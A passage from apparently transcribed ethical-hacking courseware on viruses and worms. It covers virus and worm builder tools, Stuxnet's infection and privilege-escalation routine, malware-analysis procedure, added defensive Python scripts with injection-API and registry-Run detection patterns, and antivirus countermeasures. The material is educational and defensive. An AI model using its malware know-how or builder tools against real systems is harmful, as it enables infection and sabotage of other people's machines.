DELmE's Batch Virus Maker is a simple tool that allows you to create your own choice of .bat file viruses to suit your tasks.
[Screenshot: DELmE's Batch Virus Maker option window]
FIGURE 7.22: DELmE's Batch Virus Maker Screenshot
• 63. Module Flow
Virus and Worms Concepts | Types of Viruses | Computer Worms | Malware Analysis | Countermeasures | Penetration Testing
Prior to this, we have discussed various types of viruses. Now we will discuss computer worms and how they are different from viruses. This section describes worms, worm analysis (Stuxnet), and a worm maker (Internet Worm Maker Thing).
• 64. Computer Worms
- Computer worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction
- Most worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system
- Attackers use worm payloads to install backdoors in infected computers, which turns them into zombies and creates a botnet; these botnets can be used to carry out further cyber attacks
A worm does not require a host to replicate, although in some cases one may argue that a worm's host is the machine it has infected. Worms are a subtype of viruses. Worms were considered mainly a mainframe problem, but after most of the world's systems were interconnected, worms were targeted against the Windows operating system and were sent through email, IRC, and other network functions.
• 65. How Is a Worm Different from a Virus?
- Replicates on its own: a worm takes advantage of file or information transport features on computer systems and spreads through the infected network automatically, but a virus does not
- A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs
- Spreads through the infected network
TABLE 7.1: Difference between Virus and Worms
Virus | Worm
A virus is a file that cannot be spread to other computers unless an infected file is replicated and actually sent to the other computer, whereas a worm does just the opposite. | A worm, after being installed on a system, can replicate itself and spread by using IRC, Outlook, or other applicable mailing programs.
Files such as .com, .exe, or .sys, or a combination of them, are corrupted once the virus runs on the system. | A worm typically does not modify any stored programs.
Viruses are a lot harder to get off an infected machine. | As compared to a virus, a worm can be easily removed from the system.
Their spreading options are much less than those of a worm because viruses only infect files on the machine. | They have more spreading options than a virus.
• 66. Worm Analysis: Stuxnet
- Stuxnet is a threat targeting a specific industrial control system, likely in Iran, such as a gas pipeline or power plant
- The goal of Stuxnet is to sabotage that facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend them to, most likely out of their specified boundaries
Source: http://www.symantec.com
Stuxnet is a complex threat and malware with diverse modules and functionalities. It is mostly used to seize control of and reprogram industrial control systems (ICS) by modifying code on programmable logic controllers (PLCs). This gives the attacker a way to intrude into the complete system, launch an attack by making changes in the code, and take unauthorized control of the systems without the knowledge of the operators.
Stuxnet contains many features, such as:
1. Self-replicates through removable drives, exploiting a vulnerability allowing auto-execution
2. Spreads in a LAN through a vulnerability in the Windows Print Spooler
3. Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability
4. Copies and executes itself on remote computers through network shares running a WinCC database server
• 67. 5. Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded
6. Updates itself through a peer-to-peer mechanism within a LAN
7. Exploits a total of four unpatched Microsoft vulnerabilities
8. Contacts a command and control server that allows the hacker to download and execute code, including updated versions
9. Contains a Windows rootkit that hides its binaries and attempts to bypass security products
10. Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system
• 68. Worm Analysis: Stuxnet (Cont'd)
Source: http://www.symantec.com
Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypted configuration blocks. It hooks Ntdll.dll to monitor for requests to load specially crafted filenames; these specially crafted filenames are mapped to another location instead, a location specified by W32.Stuxnet. The dropper component of Stuxnet is a wrapper program that contains all of the above components stored inside itself in a section named "stub." When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports. Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export. When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process. It uses a special method designed to bypass behavior blocking and host intrusion-protection based technologies that monitor LoadLibrary calls.
  • 69. Worm Analysis: Stuxnet (Cont'd)

Source: http://www.symantec.com

[Diagram: Infection Routine Flow; the same flow is reproduced with its labels as Figure 7.23 on the next slide]

Infection Routine Flow

Stuxnet checks if it has administrator rights on the computer. Stuxnet wants to run with the highest privilege possible so that it has permission to take whatever actions it likes on the computer. If it does not have Administrator rights, it executes one of the two zero-day escalation of privilege attacks described in the following diagram. If the process already has the rights it requires, it proceeds to prepare to call export 16 in the main .dll file. It calls export 16 by using the injection techniques described in the Injection Technique section.

When the process does not have administrator rights on the system, it tries to attain these privileges by using one of two zero-day escalation of privilege attacks. The attack vector used is based on the operating system of the compromised computer. If the operating system is Windows Vista, Windows 7, or Windows Server 2008 R2, the currently undisclosed Task Scheduler Escalation of Privilege vulnerability is exploited. If the operating system is Windows XP, the currently undisclosed win32k.sys escalation of privilege vulnerability is exploited.
  • 70. If exploited, both of these vulnerabilities result in the main .dll file running as a new process, either within the csrss.exe process in the case of the win32k.sys vulnerability or as a new task with administrator rights in the case of the Task Scheduler vulnerability. The code to exploit the win32k.sys vulnerability is stored in resource 250. Details of the Win32k.sys vulnerability and the Task Scheduler vulnerability currently are not released as patches are not yet available. After export 15 completes the required checks, export 16 is called. Export 16 is the main installer for Stuxnet. It checks the date and the version number of the compromised computer; decrypts, creates, and installs the rootkit files and registry keys; injects itself into the services.exe process to infect removable drives; injects itself into the Step 7 process to infect all Step 7 projects; sets up the global mutexes that are used to communicate between different components; and connects to the RPC server.

Export 16 first checks that the configuration data is valid; after that it checks the value "NTVDM TRACE" in the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation

[Diagram: Infection Routine Flow. Recoverable node labels, in flow order: Check CFG (Error -> Exit); Reg key NTVDM Trace=19790529 (Equal -> Exit); Date<06/24/2012 (Past deadline -> Exit); Check OS: XP or less -> Set DACL, Vista or higher -> Set SACL; Create global mutex; Decrypt resource 201 & 242 & write to disk; Create .pnf & .cfg files (Oem7a.pnf); Rootkit files Mrxnet.sys, Mrxcls.sys; Create rootkit service reg keys; Set file times; Hides malicious files; Decrypt & load self from disk; Call export 6 - get version; Compare running version number and version on disk (Version OK / File OK); Inject in service, call export 32 (Infects removable drives); Inject in Step 7 & call export 32 (Infects Step 7 projects); Create global mutexes; Exit]
FIGURE 7.23: Infection Routine Flow
  • 71. Worm Maker: Internet Worm Maker Thing

[Screenshot: Internet Worm Maker Thing, Version 4.00: Public Edition, main configuration window]

Internet Worm Maker Thing is a tool specifically designed for generating a worm. The generated Internet worms try to spread over networks; they are essentially preset invasion and proxy attacks that target the host, poison it, and establish a base from which to launch the attack in future. The worms work independently. An Internet worm sends copies of itself via vulnerable computers on the Internet.
  • 72. [Screenshot: Internet Worm Maker Thing, Version 4.00: Public Edition, option panels]
FIGURE 7.24: Internet Worm Maker Thing
  • 73. Module Flow

Malware analysis is defined as the action of taking malware apart piece by piece in order to study it. It is usually performed for various reasons, such as finding the vulnerabilities that are exploited for spreading the malware, the information that was stolen, and the prevention techniques to be taken against it to keep it from entering the system or network in future.

Module flow: Virus and Worms Concepts; Types of Viruses; Computer Worms; Malware Analysis; Countermeasures; Penetration Testing.

Detailed information about the malware analysis procedure is explained in the next few slides.
  • 74. What Is a Sheep Dip Computer?

Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware. This "sheep dipped" computer is isolated from other computers on the network to block any viruses from entering the system. Before this procedure is carried out, any downloaded programs are saved on external media such as CD-ROMs or floppy diskettes. A sheep dip computer is installed with port monitors, file monitors, network monitors, and antivirus software and connects to a network only under strictly controlled conditions.

A sheep dip computer:
- Runs port and network monitors
- Runs user, group permission, and process monitors
- Runs device driver and file monitors
- Runs registry and kernel monitors
  • 75. Antivirus Sensor Systems

An antivirus system is a collection of computer software that detects and analyzes various malicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.

[Diagram: the Network (System 1, System 2, System 3) sits behind an Antivirus System made up of Anti-Virus, Anti-Spyware, Anti-Trojan, Anti-Spamware, Anti-Phishing and Email-Scanner components, which faces the Internet; allowed traffic passes through to the systems, reflected traffic is turned back]
FIGURE 7.25: Working of Antivirus Sensor Systems

  • 76. An antivirus system includes antivirus, anti-spyware, anti-Trojan, anti-spamware, anti-phishing, an email scanner, and so on. Usually, it is placed in between the network and the Internet. It allows only genuine traffic to flow through the network and blocks malicious traffic from entering. As a result, it ensures network security.
  • 77. Malware Analysis Procedure: Preparing Testbed

Malware analysis provides an in-depth understanding of each individual sample and identifies emerging technical trends from large collections of malware samples. The samples of malware are mostly compatible with the Windows binary executable. Malware analysis is conducted with a variety of goals. The following is the procedure for preparing the malware analysis testbed:
- Install VMware or Virtual PC on the system
- Install the guest OS into the Virtual PC/VMware
- Isolate the system from the network by ensuring that the NIC card is in "host only" mode
- Disable the shared folders and the guest isolation
- Copy the malware over to the guest OS
  • 78. Malware Analysis Procedure

Step 1: Perform static analysis when the malware is inactive
Step 2: Collect information about:
- String values found in the binary with the help of string extracting tools such as BinText
- The packaging and compressing technique used with the help of compression and decompression tools such as UPX

BinText

Source: http://www.mcafee.com

BinText can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text, and resource strings, providing useful information for each item in the optional "advanced" view mode.
  • 79. [Screenshot: BinText 3.0.3 with the Search tab open, listing the ASCII ("A") and Unicode strings found in a file with their file position and memory position; status line reports the time taken, the text size (37,340 bytes) and the counts of ASCII, Unicode and resource strings]
FIGURE 7.26: BinText Screenshot

UPX

Source: http://upx.sourceforge.net

UPX achieves an excellent compression ratio and offers very fast decompression. It typically compresses better than WinZip/zip/gzip.

[Screenshot: upx.exe run without arguments in an Administrator command prompt (D:\CEH-Tools\CEHv8 Module 07 Viruses and Worms\Compression and Decompression\UPX\upx308w>), printing its usage banner:]
    Ultimate Packer for eXecutables
    Copyright (C) 1996 - 2011
    UPX 3.08w   Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th

    Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

    Commands:
      -1     compress faster                   -9    compress better
      -d     decompress                        -l    list compressed file
      -t     test compressed file              -V    display version number
      -h     give more help                    -L    display software license
    Options:
      -q     be quiet                          -v    be verbose
      -oFILE write output to 'FILE'
      -f     force compression of suspicious files
      -k     keep backup files
    file..  executables to (de)compress

    Type 'upx --help' for more detailed help.

    UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
FIGURE 7.27: UPX Working in Command Prompt
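The two static checks in Steps 1 and 2 (string extraction as BinText does it, and spotting a UPX-packed sample before trying to read it) can be scripted. The following is an added example written for this page, not BinText, UPX or the course's own code; the byte blob it scans is constructed to look like a fragment of a packed PE and is not a real malware file, and the API watchlist is an assumption about what an analyst would flag.

```python
"""Static triage of a suspect file (Steps 1 and 2): pull out printable strings
the way BinText does and look for UPX packer markers. Added example, not
from the course material; SAMPLE below is constructed, not a real binary."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Imports an injector needs. Seeing them in a binary's strings is a reason
# to look closer, not proof of anything (assumed watchlist for this example).
INJECTION_APIS = {
    "CreateRemoteThread", "WriteProcessMemory", "VirtualAllocEx",
    "NtMapViewOfSection", "SetWindowsHookExA", "SetWindowsHookExW",
}


@dataclass
class Finding:
    kind: str     # "ascii" or "unicode"
    offset: int   # file position of the first byte
    text: str


def extract_strings(data: bytes, min_len: int = 5) -> list[Finding]:
    """Printable ASCII runs and UTF-16LE runs (BinText's 'Unicode') of at
    least min_len characters, ordered by file offset."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [Finding("ascii", m.start(), m.group().decode("ascii"))
             for m in ascii_re.finditer(data)]
    found += [Finding("unicode", m.start(), m.group().decode("utf-16-le"))
              for m in utf16_re.finditer(data)]
    return sorted(found, key=lambda f: f.offset)


def upx_markers(data: bytes) -> list[str]:
    """Stock UPX names the sections of a packed PE UPX0/UPX1 and writes an
    'UPX!' info block; seeing them means run 'upx -d' before reading strings.
    Modified packers strip these, so an empty list proves nothing."""
    return [m for m in ("UPX0", "UPX1", "UPX!") if m.encode() in data]


def triage(data: bytes) -> dict:
    """Summarise what a first look at the strings turns up."""
    strings = extract_strings(data)
    return {
        "string_count": len(strings),
        "upx_markers": upx_markers(data),
        "urls": [f.text for f in strings if re.match(r"https?://", f.text)],
        "registry": [f.text for f in strings
                     if re.search(r"(?i)^HKEY_|\\CurrentVersion\\Run", f.text)],
        "injection_apis": [f.text for f in strings if f.text in INJECTION_APIS],
    }


# Constructed stand-in for a packed executable (not a real file).
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56            # truncated DOS header
    + b"UPX0\x00\x00\x00\x00" + b"UPX1\x00\x00\x00\x00"     # section names left by UPX
    + b"\x8c\x10\x0d\x02UPX!\x0d\x09\x02\x08"               # UPX info-block marker
    + b"http://example.invalid/update.php\x00\x00"          # ASCII, C2-style URL
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16-le")
    + b"\x00\x00"                                           # UTF-16 terminator
    + b"CreateRemoteThread\x00WriteProcessMemory\x00"       # imports by name
    + b"\x7f\x00\xff\xfe\x13\x37"                           # trailing junk
)

if __name__ == "__main__":
    for f in extract_strings(SAMPLE):
        print(f"{f.offset:08x}  {f.kind:7}  {f.text}")
    print(triage(SAMPLE))
```

Run against a real sample, feed `triage()` the bytes of the file; if `upx_markers` is non-empty, unpack with `upx -d` and scan again, since the interesting strings live in the compressed section and will not show up until then.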
  • 80. Malware Analysis Procedure (Cont'd)

Step 3: Set up the network connection and check that it is not giving any errors
Step 4: Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer

Process Monitor

Source: http://technet.microsoft.com

Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, registry, and process/thread activity.
  • 81. [Screenshot: Process Monitor (Sysinternals) showing 89,723 of 186,768 events with Time of Day, Process Name, PID, Operation, Path, Result and Detail columns; rows include CreateFileMapping, CloseFile, CreateFile and ReadFile events from Explorer.EXE (PID 2384) and mmc.exe (PID 4100) and TCP Receive/TCP Send events from firefox.exe (PID 2760), all with result SUCCESS]
FIGURE 7.28: Process Monitor Screenshot
  • 82. Malware Analysis Procedure (Cont'd)

Step 5: Record network traffic information using connectivity and log packet content monitoring tools such as NetResident and TCPView
Step 6: Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot

NetResident

Source: http://www.tamos.com

NetResident is a network content analysis application designed to monitor, store, and reconstruct a wide range of network events and activities, such as email messages, web pages, downloaded files, instant messages, and VoIP conversations. It uses advanced monitoring technology to capture the data on the network, saves the data to a database, reconstructs it, and displays the content.
  • 83. [Screenshot: NetResident (Evaluation Version) with the Events view filtered by Dates, Protocols, Party A and Party B; the list shows Web events dated 10/5/2012 between host WIN-LXQN3... and hosts maa03s04-in... and mystart-ton..., on ports 80 and 443; the Event Detail pane shows a POST request to http://news.google.co.in/news/xhr/rhc?authuser=0 with a 180-byte body]
FIGURE 7.29: NetResident Screenshot
  • 84. Malware Analysis Procedure (Cont'd)
Step 7: Collect the following information using debugging tools such as OllyDbg and ProcDump:
- Service requests
- Attempts for incoming and outgoing connections
- DNS tables information

OllyDbg
Source: http://www.ollydbg.de
OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft Windows. Its emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.
Module 07 Page 1089
  • 85. [Figure 7.30: OllyDbg screenshot of the CPU window (main thread, module OLLYDBG) showing the disassembly, registers, and stack panes]
FIGURE 7.30: OllyDbg Screenshot
Module 07 Page 1090
  • 86. Virus Analysis Tool: IDA Pro
Source: http://www.hex-rays.com
IDA Pro is a disassembler and debugger tool that supports both Windows and Linux platforms.

Disassembler
The disassembler displays the instructions a program executes in symbolic form, even when the code is available only in binary form. It presents the processor's instruction flow in the form of maps. It also enables users to identify viruses: for example, if a screensaver or "gif" file is trying to spy on an internal application of the user, IDA Pro reveals this immediately. IDA Pro is built with the latest techniques, which enable it to trace difficult binary code and display it as readable execution maps.

Debugger
The debugger is an interactive tool that complements the disassembler, so that the static analysis is performed in a single step. It bypasses the obfuscation process, which helps in processing the hostile code in depth.
Module 07 Page 1091
  • 87. IDA Pro is a tool that allows you to explore software interrupts and vulnerabilities and to use it for tamper resistance. It is an interactive, programmable, multi-processor disassembler coupled to a local and remote debugger and augmented by a complete plugin programming environment. It can also be used to protect your essential privacy rights. It is used by antivirus companies, research companies, software development companies, agencies, and military organizations.
[Figure: IDA Demo 6.3 screenshot of qwingraph.exe, showing the Functions window, the IDA View-A disassembly of WinMain (calls to GetCommandLineW and QString::fromWCharArray / toLocal8Bit), and the Output window reporting that IDA is analysing the input file using the Microsoft VisualC 2-10/net runtime FLIRT signature]
Module 07 Page 1092
  • 88. Online Malware Testing: VirusTotal
VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the detection of viruses, worms, Trojans, etc.
[Screenshot: VirusTotal analysis report for an uploaded sample, showing per-engine detection results dated 2012-07-17]

Source: http://www.virustotal.com
VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans, and all kinds of malware detected by antivirus engines.
Features:
- Free and independent service
- Uses multiple antivirus engines
- Real-time automatic updates of virus signatures
- Gives detailed results from each antivirus engine
- Has real-time global statistics
Module 07 Page 1093
  • 89. [Figure 7.32: VirusTotal screenshot showing the per-engine analysis results for the uploaded sample]
FIGURE 7.32: VirusTotal Screenshot
Module 07 Page 1094
  • 90. Online Malware Analysis Services
Online malware analysis services let you scan files and other resources and secure them before attackers can exploit and compromise them. A few online malware analysis services are listed as follows:
- Anubis: Analyzing Unknown Binaries, available at http://anubis.iseclab.org
- Avast! Online Scanner, available at http://onlinescan.avast.com
- Malware Protection Center, available at https://www.microsoft.com
- ThreatExpert, available at http://www.threatexpert.com
- Dr. Web Online Scanners, available at http://vms.drweb.com
- Metascan Online, available at http://www.metascan-online.com
- Bitdefender QuickScan, available at http://www.bitdefender.com
- GFI SandBox, available at http://www.gfi.com
- UploadMalware.com, available at http://www.uploadmalware.com
- Fortinet, available at http://www.fortiguard.com
Module 07 Page 1095
  • 91. Module Flow
So far, we have discussed various viruses and worms and malware analysis. Now we will discuss the countermeasures to be applied to protect against viruses and worms, if any are found. These countermeasures help in enhancing security.
- Virus and Worms Concept
- Types of Viruses
- Computer Worms
- Malware Analysis
- Countermeasures
- Penetration Testing
This section highlights various virus and worm countermeasures.
Module 07 Page 1096
  • 92. Virus Detection Methods
Scanning: Once a virus has been detected, it is possible to write scanning programs that look for the signature strings characteristic of the virus
Integrity Checking: Integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors
Interception: The interceptor monitors the operating system requests that are written to the disk

A virus scanner is an important piece of software that one should have installed on the PC. If there is no scanner, there is a high chance that the system will be hit by and suffer from a virus. A virus protector should be run regularly on the PC, and the scan engine and virus signature database have to be updated often. Antivirus software is of no use if it does not know what to look for in the latest virus. One should always remember that an antivirus program cannot stop everything. The rule of thumb is that if an email looks suspicious, e.g., one is not expecting an email from the sender, does not know the sender, or the header looks like something a known sender would not normally say, one must be careful about opening it, as there is a risk of becoming infected by a virus. The MyDoom and W32.Novarg.A@mm worms recently infected many Internet users, most of them through email. The three best methods for antivirus detection are:
- Scanning
- Integrity checking
- Interception
In addition, a combination of some of these techniques can be more effective.
Module 07 Page 1097
  • 93. Scanning
- The moment a virus is detected in the wild, antivirus vendors across the globe start writing scanning programs that look for its signature strings (characteristic of the virus).
- The strings are identified and extracted from the virus by these scanner writers. The resulting new scanners search memory, files, and system sectors for the signature strings of the new virus. The scanner declares the presence of a virus once it finds a match. Only known and pre-defined viruses can be detected.
- Virus writers often create many new viruses by altering an existing one. What looks like a new virus may have taken just a few minutes to create. Attackers make these changes frequently to throw off the scanners.
- In addition to signature recognition, new scanners make use of various other detection techniques, such as code analysis. Before looking into the code characteristics of a virus, the scanner examines the code at various locations in an executable file.
- Another possibility is that the scanner sets up a virtual computer in RAM and tests programs by executing them in that virtual space. This technique, called "heuristic scanning," can also check and remove messages that might contain a computer virus or other unwanted content.
- The major advantages of scanners are:
  - They can check programs before they are executed.
  - It is the easiest way to check new software for any known or malicious virus.
- The major drawbacks of scanners are:
  - Old scanners can prove unreliable. With the tremendous increase in new viruses, old scanners quickly become obsolete. It is best to use the latest scanners available on the market.
  - Even a new scanner is never equipped to handle all new challenges, since viruses appear more rapidly than new scanners can be developed to battle them.
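The signature-string scanning described above, as an added example that is not part of the module or of any antivirus product: a small scanner whose signatures may contain wildcard bytes, showing both why a trivially altered variant slips past an exact signature and how a family signature still catches it. Signature names, hex patterns, and sample buffers are all constructed for the demonstration.

```python
"""Signature scanner with wildcard signatures (added example; not code from the
CEH module or any antivirus product).

Signatures are hex strings in which "??" matches any single byte, so one
signature can still catch a variant that was produced by altering a few bytes
of an existing sample.  Every signature and sample "file" below is constructed
for the demonstration and corresponds to no real malware.
"""
import re
from pathlib import Path

# Constructed signature database: detection name -> hex pattern.
SIGNATURES = {
    # Exact bytes of "TESTSAMPLE-A": only that precise string matches.
    "Demo.Exact.A": "5445535453414d504c452d41",
    # Two wildcard bytes: one signature covers a whole family of variants.
    "Demo.Family.Gen": "dead??beef??cafe",
}


def compile_signature(hex_pattern: str) -> "re.Pattern":
    """Turn a hex pattern with '??' wildcards into a byte regex."""
    if len(hex_pattern) % 2:
        raise ValueError(f"odd-length signature: {hex_pattern!r}")
    parts = []
    for i in range(0, len(hex_pattern), 2):
        token = hex_pattern[i:i + 2]
        if token == "??":
            parts.append(b".")  # any single byte
        else:
            try:
                parts.append(re.escape(bytes([int(token, 16)])))
            except ValueError:
                raise ValueError(f"bad hex byte {token!r} in {hex_pattern!r}") from None
    # DOTALL so the wildcard also matches 0x0a, which "." would otherwise skip.
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {name: compile_signature(pat) for name, pat in SIGNATURES.items()}


def scan_bytes(data: bytes) -> list:
    """Return the sorted list of signature names found in the buffer."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(data))


def scan_tree(root: str) -> dict:
    """Scan every regular file under root; map relative path -> detections."""
    root_path = Path(root)
    results = {}
    for path in sorted(root_path.rglob("*")):
        if path.is_file():
            hits = scan_bytes(path.read_bytes())
            if hits:
                results[path.relative_to(root_path).as_posix()] = hits
    return results


# Constructed samples (not files from the module).
SAMPLE_EXACT = b"header\x00TESTSAMPLE-A\x00payload"
SAMPLE_EXACT_VARIANT = b"header\x00TESTSAMPLE-B\x00payload"  # one byte changed
SAMPLE_FAMILY_1 = b"\x00\xde\xad\x01\xbe\xef\x02\xca\xfe"
SAMPLE_FAMILY_2 = b"\xde\xad\x99\xbe\xef\n\xca\xfe\x00"  # wildcard byte is 0x0a
SAMPLE_CLEAN = b"nothing to see here"


if __name__ == "__main__":
    for label, blob in [("exact", SAMPLE_EXACT), ("exact-variant", SAMPLE_EXACT_VARIANT),
                        ("family-1", SAMPLE_FAMILY_1), ("family-2", SAMPLE_FAMILY_2),
                        ("clean", SAMPLE_CLEAN)]:
        print(f"{label:14s} -> {scan_bytes(blob) or 'no match'}")
```

The exact signature misses the one-byte variant, which is the "altered existing virus" case the text describes, while the wildcard signature matches both family samples.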
In te g rity C h e c k in g 0 Integrity checking products perform their functions by reading and recording integrated data to develop a signature or base line for those files and system sectors. Q Integrity products check any program with built-in intelligence. This is really the only solution that can take care of all the threats to data. The most trusted way to know the amount of damage done by a virus is provided by these integrity checkers, since they can check data against the originally established base line. Module 07 Page 1098 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 94. A disadvantage of a basic integrity checker is that it cannot differentiate file corruption caused by a bug from corruption caused by a virus.
- However, some advanced integrity checkers are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers combine some of the antivirus techniques with integrity checking to create a hybrid. This also simplifies the virus checking process.

Interception
- The main use of an interceptor is for deflecting logic bombs and Trojans.
- The interceptor controls requests to the operating system for network access or for actions that pose a threat to the program. If it finds such a request, the interceptor generally pops up and asks whether the user wants to allow the request to continue. There are no dependable ways to intercept direct branches to low-level code or direct input and output instructions issued by the virus. In some cases, the virus is capable of disabling the monitoring program itself. Some years back, it took only eight bytes of code to turn off the monitoring functions of a widely used antivirus program.
Module 07 Page 1099
  • 95. Virus and Worms Countermeasures
Preventive measures need to be followed in order to lessen the possibility of virus infections and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be minimized.
Some of these methods include:
- Install antivirus software that detects and removes infections as they appear
- Generate an antivirus policy for safe computing and distribute it to the staff
- Pay attention to the instructions while downloading files or any programs from the Internet
- Update the antivirus software on a monthly basis, so that it can identify and clean out new bugs
- Avoid opening attachments received from an unknown sender, as viruses spread via email attachments
- A virus infection may corrupt data, so regularly maintain data backups
- Schedule regular scans for all drives after the installation of antivirus software
- Do not accept disks or programs without checking them first using a current version of an antivirus program
Module 07 Page 1100
  • 96. Virus and Worms Countermeasures (Cont'd)
- Ensure the executable code sent to the organization is approved
- Run disk cleanup, registry scanner, and defragmentation once a week
- Do not boot the machine with an infected bootable system disk
- Turn on the firewall if the OS used is Windows XP
- Keep informed about the latest virus threats
- Run anti-spyware or anti-adware once a week
- Check DVDs and CDs for virus infection
- Block files with more than one file type extension
- Ensure the pop-up blocker is turned on and use an Internet firewall
- Be cautious with files being sent through instant messengers
Module 07 Page 1101
  • 97. Companion Antivirus: Immunet
Source: http://www.immunet.com
Companion Antivirus means that Immunet is compatible with existing antivirus solutions. Immunet adds an extra, lightweight layer of protection for greater peace of mind. Since traditional antivirus solutions detect on average only 50% of online threats, most users are under-protected, which is why every PC can benefit from Immunet's essential layer of security. Immunet Protect's detection power relies on ETHOS and SPERO, the heuristics-based engine and the cloud engine. Users of the Plus version also benefit from a third engine called TETRA, which provides protection when not connected to the Internet.
Module 07 Page 1102
  • 98. [Figure 7.33: Immunet 3.0 screenshot showing the Summary view with the community size, the last scan time, and the scan results]
FIGURE 7.33: Immunet Screenshot
Module 07 Page 1103
  • 99. Antivirus Tools
Antivirus tools prevent, detect, and remove viruses and other malicious code from your system. These tools protect your system and repair viruses in all incoming and outgoing email messages and instant messenger attachments. In addition, these tools monitor the network's traffic for malicious activity. A few antivirus tools that can be used for detecting and removing viruses from systems are listed as follows:
- AVG Antivirus, available at http://free.avg.com
- BitDefender, available at http://www.bitdefender.com
- Kaspersky Anti-Virus, available at http://www.kaspersky.com
- Trend Micro Internet Security Pro, available at http://apac.trendmicro.com
- Norton AntiVirus, available at http://www.symantec.com
- F-Secure Anti-Virus, available at http://www.f-secure.com
- Avast Pro Antivirus, available at http://www.avast.com
- McAfee AntiVirus Plus 2013, available at http://home.mcafee.com
- ESET Smart Security 6, available at http://www.eset.com
- Total Defense Internet Security Suite, available at http://www.totaldefense.com
Module 07 Page 1104
  • 100. Module Flow
Penetration testing must be conducted against viruses and worms, as they are the most widely used means of attack. They do not require extensive knowledge to use. Hence, you should conduct pen testing on your system or network before a real attacker exploits it.
- Virus and Worms Concept
- Types of Viruses
- Computer Worms
- Malware Analysis
- Countermeasures
- Penetration Testing
This section provides insight into virus and worm pen testing.
Module 07 Page 1105
  • 101. Penetration Testing for Viruses
Since you are an expert ethical hacker and penetration tester, the IT director instructs you to test the network for any viruses and worms that could damage or steal the organization's information. You need to construct viruses and worms and try to inject them into a dummy network (virtual machine) and check whether they are detected by antivirus programs or are able to bypass the network firewall. As a pen tester, you should carry out the following steps to conduct a virus penetration test:
Step 1: Install an antivirus program
You should install an antivirus program on the network infrastructure and on the end-user's system before conducting the penetration test.
Step 2: Update the antivirus software
Check whether your antivirus is updated or not. If not, update your antivirus software so that its virus database includes the newly identified viruses.
Step 3: Scan the system for viruses
You should scan your target system; this will help you to repair damage or delete files infected with viruses.
Module 07 Page 1106
  • 102. Penetration Testing for Viruses (Cont'd)
Step 4: Set the antivirus to quarantine or delete the virus
Set your antivirus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible, or delete them if not.
Step 5: Go to safe mode and delete the infected file manually
If the virus is not removed, then go to safe mode and delete the infected file manually. If the system is not infected, or the virus has been removed, the system is safe.
Module 07 Page 1107
  • 103. Penetration Testing for Viruses (Cont'd)
Step 6: Scan the system for running processes
You should scan your system for suspicious running processes. You can do this by using tools such as What's Running, Winsonar, HijackThis, etc. If any suspicious process, registry entry, startup program, or service is discovered, check the associated executable files and collect more information about them from the publisher's website, if available, and from the Internet.
Step 7: Scan the system for suspicious registry entries
You should scan your system for suspicious registry entries. You can do this by using tools such as jv16 Power Tools 2012, Reg Organizer, and RegShot.
Step 8: Scan the system for Windows services
You should scan for suspicious Windows services running on your system. You can do this by using tools such as SrvMan and ServiWin.
Step 9: Scan the system for startup programs
You should scan your system for suspicious startup programs. Check the startup programs and determine whether all the programs in the list can be recognized with known functionalities. Tools such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs.
Step 10: Scan the system for file and folder integrity
You should scan your system for file and folder integrity. Check the data files for modification or manipulation by opening several files and comparing their hash values with a pre-computed hash. You can do this by using tools such as FCIV, TRIPWIRE, and SIGVERIF.
Module 07 Page 1108
  • 104. Penetration Testing for Virus (Cont'd)
    Slide: Scan for modification to OS files: check the critical OS files for modification or manipulation using tools such as TRIPWIRE, or by manually comparing hash values if you have a backup copy (tools: FCIV and TRIPWIRE). Document all the findings from the previous steps; this helps in determining the next action if viruses are identified in the system. Isolate the infected machine from the network immediately to prevent further infection. Update and run antivirus: sanitize the complete system for viruses using an updated anti-virus, and if it cannot clean them, find another anti-virus solution to clean the viruses.
    Step 11: Scan the system for critical OS modifications. You can scan critical OS files for modification or manipulation using tools such as TRIPWIRE, or by manually comparing hash values if you have a backup copy.
    Step 12: Document all findings. These findings can help you determine the next action if viruses are identified on the system.
    Step 13: Isolate the infected system. Once an infected system is identified, you should isolate it from the network immediately in order to prevent further infection.
